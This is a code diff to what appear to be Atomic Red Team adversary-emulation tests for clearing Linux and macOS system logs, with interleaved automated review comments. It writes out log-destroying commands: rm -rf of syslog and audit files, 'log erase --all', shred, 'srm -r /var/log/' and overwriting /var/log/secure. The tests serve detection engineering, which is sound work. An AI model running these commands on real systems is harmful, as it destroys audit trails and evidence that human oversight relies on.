+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/spool/mail/#{username}
+
+ '
+ get_prereq_command: 'touch /var/spool/mail/#{username}
+
+ '
executor:
+ elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
@@ -3368,6 +3419,11 @@ defense-evasion:
'
name: bash
+ elevation_required: true
+ cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
+ ; fi
+
+ '
T1218.004:
technique:
x_mitre_platforms:
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index fa9e9661..2c80a7c9 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -3041,10 +3041,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -3059,7 +3082,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -3071,9 +3093,25 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
+ truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
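Review bot: The new dependency only checks that the target file exists; macOS ships no `truncate` binary in the base system (it comes with GNU coreutils), so `prereq_command` should also verify the tool: `stat #{system_log_path} && command -v truncate`. The `touch` in `get_prereq_command` runs without sudo against a /var/log path that is normally root-owned, while the executor uses sudo, so it fails for a non-root runner; `sudo touch #{system_log_path}` matches the executor.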
@@ -3085,10 +3123,26 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -3099,11 +3153,37 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
+ get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -3114,8 +3194,13 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
executor:
- command: 'sudo echo '''' > /var/log/system.log
+ command: 'sudo echo '''' > #{system_log_path}
'
name: sh
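Review bot: `sudo echo '' > #{system_log_path}` truncates the file through a redirect that the unprivileged shell opens before sudo runs, so it fails with permission denied on a root-owned log unless the runner itself is root; `sudo sh -c 'echo "" > #{system_log_path}'` performs the write as root. This is also the only test in the set that gained an input argument without a matching `dependencies` block, so it runs against a possibly missing file; adding the same `stat`/`touch` prereq as the neighbouring tests keeps the set consistent.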
@@ -3141,8 +3226,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo unlink /var/log/system.log
+ command: 'sudo unlink #{system_log_path}
'
name: sh
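Review bot: `get_prereq_command` touches the log without sudo while the executor unlinks it with sudo; on a root-owned /var/log path the prereq fails for a non-root runner and the test is never reached. Use `sudo touch #{system_log_path}` so the prereq runs with the same privileges the executor assumes.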
@@ -3155,8 +3256,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo shred -u -z -n 3 /var/log/system.log
+ command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
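Review bot: `shred` is not part of the macOS base system (it is a GNU coreutils tool), and the new dependency only checks the target file, so the executor still fails with "command not found" on a stock Mac; extend the check to `prereq_command: 'stat #{system_log_path} && command -v shred'`. The `touch` in `get_prereq_command` also runs without the sudo the executor uses, so it fails on a root-owned /var/log for a non-root runner; `sudo touch #{system_log_path}` fixes that.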
@@ -3169,10 +3286,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: "/var/log/"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path} #{system_log_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
+ #{system_log_folder}/system.log
+
+ '
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -3184,8 +3322,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+ command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
@@ -3199,8 +3353,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+ command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md
index a78329a3..0f0d214d 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -58,18 +58,37 @@ Delete system and audit logs
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log|
+| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo rm -rf /private/var/log/system.log*
-sudo rm -rf /private/var/audit/*
+sudo rm -rf #{syslog_path}
+if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{syslog_path}
+if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
+```
+
+
@@ -94,7 +113,6 @@ This test deletes main log datastore, inflight log data, time-to-live data(TTL),
```sh
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
-sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
```
@@ -117,18 +135,35 @@ This test truncates the system log files using the truncate utility with (-s 0 o
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path of system log to delete. | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo truncate -s 0 /var/log/system.log #size parameter shorthand
-sudo truncate --size=0 /var/log/system.log #size parameter
+sudo truncate -s 0 #{system_log_path} #size parameter shorthand
+sudo truncate --size=0 #{system_log_path} #size parameter
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -146,18 +181,35 @@ The first sub-test truncates the log file to zero bytes via /dev/null and the se
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path of system log to delete. | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
-sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -175,19 +227,38 @@ This test finds and deletes the system log files within /var/log/ directory usin
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_name1 | name or prefix of system log to delete. | string | system.log|
+| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz|
+| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
-sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
-sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+```
+##### Get Prereq Commands:
+```sh
+touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+```
+
+
@@ -205,12 +276,17 @@ This test overwrites the contents of system log file with an empty string using
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo echo '' > /var/log/system.log
+sudo echo '' > #{system_log_path}
```
@@ -261,17 +337,34 @@ This test deletes the system log file using unlink utility
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo unlink /var/log/system.log
+sudo unlink #{system_log_path}
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -289,17 +382,34 @@ This test overwrites the contents of the log file with zero bytes(-z) using thre
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo shred -u -z -n 3 /var/log/system.log
+sudo shred -u -z -n 3 #{system_log_path}
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -319,18 +429,36 @@ Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+| system_log_folder | path to log parent folder | string | /var/log/|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo srm /var/log/system.log #system log file deletion
-sudo srm -r /var/log/ #recursive deletion of log files
+sudo srm #{system_log_path} #system log file deletion
+sudo srm -r #{system_log_folder} #recursive deletion of log files
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path} #{system_log_folder}
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
+```
+
+
@@ -348,17 +476,34 @@ This test deletes the system log file using osascript via "do shell script"(sh/b
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -378,17 +523,34 @@ Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -406,18 +568,35 @@ The first sub-test deletes the journal files using rm utility in the "/var/log/j
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| journal_folder | path to journal logs | string | /var/log/journal|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{journal_folder}
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+```
+
+
@@ -441,7 +620,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
| username | Username of mail spool | string | root|
-#### Attack Commands: Run with `bash`!
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
@@ -451,6 +630,18 @@ echo 0> /var/spool/mail/#{username}
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat /var/spool/mail/#{username}
+```
+##### Get Prereq Commands:
+```sh
+touch /var/spool/mail/#{username}
+```
+
+
@@ -474,13 +665,17 @@ This test overwrites the specified log. This technique was used by threat actor
| log_path | Path of specified log | path | /var/log/secure|
-#### Attack Commands: Run with `bash`!
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo 0> #{log_path}
```
+#### Cleanup Commands:
+```bash
+if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
+```
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 4301a4f3..c58d7d06 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -8,10 +8,28 @@ atomic_tests:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
+ type: string
+ default: /var/log/system.log
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: /var/audit/20220725213300.202208110700021
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
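Review bot: With the new default, `sudo rm -rf #{syslog_path}` removes only `/var/log/system.log`, whereas the replaced line used `system.log*` and also caught rotated archives; the description of `syslog_path` still advertises `/var/log/system.log*`, so either the default should carry the glob or the description should drop it. The `#{...}` values are interpolated into `sh` unquoted here and in every hunk of this file, so a path containing spaces or glob characters breaks the command; quoting the single-file cases (`sudo rm -rf "#{syslog_path}"`) would be safer wherever a glob is not intended. The `macos_audit_path` default names one specific audit record, which works for the prereq that creates it but will not correspond to real audit files on a target host — presumably intended, and worth a one-line comment on the argument.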
@@ -24,7 +42,6 @@ atomic_tests:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -33,10 +50,23 @@ atomic_tests:
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo truncate -s 0 /var/log/system.log #size parameter shorthand
- sudo truncate --size=0 /var/log/system.log #size parameter
+ sudo truncate -s 0 #{system_log_path} #size parameter shorthand
+ sudo truncate --size=0 #{system_log_path} #size parameter
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -45,10 +75,23 @@ atomic_tests:
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
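Review bot: The test name and the description above it still say the second sub-test fills the file via `/dev/zero` using the cat utility, but the new command is `sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path}`, which writes a bounded 5000 bytes with dd; the description should say so (replacing the unbounded `cat /dev/zero` redirect is the right call, since it would otherwise fill the volume). In `sudo cat /dev/null > #{system_log_path}` the redirection is performed by the invoking shell, not by the sudo'd process, so the command only succeeds when the caller can already write the target; under `elevation_required: true` the runner presumably executes as root, in which case the `sudo` is redundant rather than wrong. The same applies to `sudo echo '' > #{system_log_path}` in the echo hunk below; `sudo sh -c 'cat /dev/null > #{system_log_path}'` would make the privilege boundary explicit.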
@@ -57,11 +100,32 @@ atomic_tests:
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+ get_prereq_command: |
+ touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
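Review bot: None of the files the new `get_prereq_command` creates can be matched by the attack commands: `-name '#{system_log_name1}.*'` requires a dot after the name, so `/var/log/system.log` does not match `system.log.*`, and likewise `system.log.97.gz` does not match `system.log.97.gz.*`; the dependency check passes and the three `find` commands delete nothing. Either create rotated-style files in the prereq (e.g. `touch /var/log/#{system_log_name1}.1`) or drop the dot from the patterns (`-name '#{system_log_name1}*'`), whichever matches the intended behaviour. The defaults `system.log.97.gz`/`system.log.98.gz` already look like rotated names, which suggests the trailing `.*` was carried over from the old fixed pattern by mistake. `shred` is also invoked here but is not part of the macOS base system; see the shred hunk below.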
@@ -70,9 +134,14 @@ atomic_tests:
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
executor:
command: |
- sudo echo '' > /var/log/system.log
+ sudo echo '' > #{system_log_path}
name: sh
elevation_required: true
- name: Real-time system log clearance/deletion
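Review bot: This is the only test in the file that gains an `input_arguments` block without a matching `dependency_executor_name`/`dependencies` entry, so unlike its siblings nothing verifies that `#{system_log_path}` exists before `sudo echo '' > #{system_log_path}` runs. Adding the same `stat #{system_log_path}` / `touch #{system_log_path}` pair keeps the tests consistent and gives the runner a prereq to report. The argument description ("path to system.log") already matches the siblings, so only the dependency block is missing.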
@@ -92,9 +161,22 @@ atomic_tests:
This test deletes the system log file using unlink utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo unlink /var/log/system.log
+ sudo unlink #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using shred utility
@@ -103,9 +185,22 @@ atomic_tests:
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo shred -u -z -n 3 /var/log/system.log
+ sudo shred -u -z -n 3 #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using srm utility
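Review bot: The new `dependencies` block checks only that the target file exists, but `shred` is a GNU coreutils tool that is not in the macOS base system, and this test lists `macos` as its only platform; the test still fails on a stock Mac even when the prereq passes. Extending the check to the tool, e.g. `prereq_command: stat #{system_log_path} && command -v shred`, would make the dependency honest, with `get_prereq_command` reporting that coreutils must be installed rather than silently touching the file. The find-based test above also invokes `shred` and has the same gap.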
@@ -116,10 +211,27 @@ atomic_tests:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: /var/log/
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path} #{system_log_folder}
+ get_prereq_command: |
+ mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
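Review bot: `get_prereq_command` touches `#{system_log_folder}/system.log` with a hard-coded file name alongside `#{system_log_path}`; with the defaults both expand to `/var/log/system.log`, and with an overridden `system_log_path` the prereq creates a second, unexpected file. If the intent is to guarantee the folder is non-empty for `srm -r`, a comment saying so would help; otherwise `touch #{system_log_path}` alone is enough. Note also that `sudo srm -r #{system_log_folder}` with the default `/var/log/` removes the whole directory tree, not just the test's files, so recreating it with `mkdir -p` on the next run does not restore what other services logged there — worth stating in the description.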
@@ -128,9 +240,22 @@ atomic_tests:
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+ osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
name: sh
elevation_required: true
- name: Delete system log files using Applescript
@@ -141,9 +266,22 @@ atomic_tests:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
